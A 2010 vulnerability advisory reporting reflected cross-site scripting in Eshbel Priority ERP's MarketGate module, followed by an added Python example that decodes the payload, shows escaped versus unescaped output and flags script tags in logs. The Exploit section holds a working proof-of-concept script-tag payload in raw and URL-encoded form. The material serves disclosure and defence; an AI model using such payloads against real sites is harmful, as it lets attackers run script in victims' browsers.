=========================================
Yaniv Miron aka "Lament" Advisory Feb 27, 2010
Eshbel Priority MarketGate module Cross Site Scripting Vulnerability
=========================================

=====================
I. BACKGROUND
=====================
Priority’s ERP

The features listed below are a selection of the functionality
available in the Priority modules.
BI (Business Intelligence), Purchasing, BPM (Business Process Management),
Manufacturing/Production, GL + Financials, Human Resources,
CRM (Customer Relations Management), Project Management,
Order Processing, System Administration, Service and Customer Support,
SDK (Generators), Inventory Control, User Configuration, WMS

http://www.eshbel.com//ERP-Feature.htm

=====================
II. DESCRIPTION
=====================

A malicious attacker may inject scripts into the Priority ERP application using the "Referer" field.

=====================
III. ANALYSIS
=====================

Exploitation of this vulnerability results in the execution of arbitrary
script code in the victim's browser, using a malicious "Referer" field.

=====================
IV. EXPLOIT
=====================

http://example.com/marketgate/PriHtml.dll/WWWxxxxxxxx

Referer: http://example.com/marketgate/priorSysMan.htm

WWWxxxxxxxx=>"'><script>alert(31337)</script>&_yyyyyyyy=>"'><script>alert(31337)</script>

-------------------------------------------------------------------------------------------------------------------------------------

Referer: http://example.com/marketgate/priorSysMan.htm

WWWxxxxxxxx=%3E%22%27%3E%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&_yyyyyyyy=%3E%22%27%3E%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E
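The following is an added example, not part of the advisory or of the vendor's code. It parses the two parameter strings shown above, confirms the URL-encoded variant decodes to the same payload, and contrasts a page that reflects the parameter verbatim with one that HTML-escapes it on output; the input-tag template and the log-review helper are assumptions made for the example.

```python
import html
import re
from urllib.parse import parse_qs

# Parameter strings copied from the advisory (raw and URL-encoded forms).
PARAMS_RAW = ("WWWxxxxxxxx=>\"'><script>alert(31337)</script>"
              "&_yyyyyyyy=>\"'><script>alert(31337)</script>")
PARAMS_ENCODED = ("WWWxxxxxxxx=%3E%22%27%3E%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E"
                  "&_yyyyyyyy=%3E%22%27%3E%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E")

# Hypothetical template (assumption): the module reflects a parameter
# into an attribute value of the generated page.
TEMPLATE = '<input name="{name}" value="{value}">'

# A live script tag: a real '<' followed by 'script', case-insensitive.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def decode_params(qs):
    """Return the URL-decoded parameters of a query/body string."""
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def render_vulnerable(name, value):
    """Reflect the parameter verbatim: the behaviour the advisory describes."""
    return TEMPLATE.format(name=name, value=value)


def render_fixed(name, value):
    """Reflect the parameter HTML-escaped, so quotes and brackets stay inert."""
    return TEMPLATE.format(name=name, value=html.escape(value, quote=True))


def contains_script(markup):
    """True if the markup would yield a real <script> element when parsed."""
    return SCRIPT_TAG.search(markup) is not None


def flag_params(qs):
    """Log-review helper: names of parameters whose decoded value carries a script tag."""
    return sorted(k for k, v in decode_params(qs).items() if contains_script(v))


if __name__ == "__main__":
    payload = decode_params(PARAMS_ENCODED)["WWWxxxxxxxx"]
    print("decoded payload :", payload)
    print("vulnerable page :", render_vulnerable("WWWxxxxxxxx", payload))
    print("escaped page    :", render_fixed("WWWxxxxxxxx", payload))
    print("flagged params  :", flag_params(PARAMS_ENCODED))
```

Decoding before matching matters: the encoded request carries no literal "<script" and would slip past a check that inspects the raw query string.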

=====================
V. DISCLOSURE TIMELINE
=====================

Jan 2009 Vulnerability Found
Jan 2009 Vendor Notification
Feb 2010 Public Disclosure

=====================
VI. CREDIT
=====================

Yaniv Miron aka "Lament".
lament@ilhack.org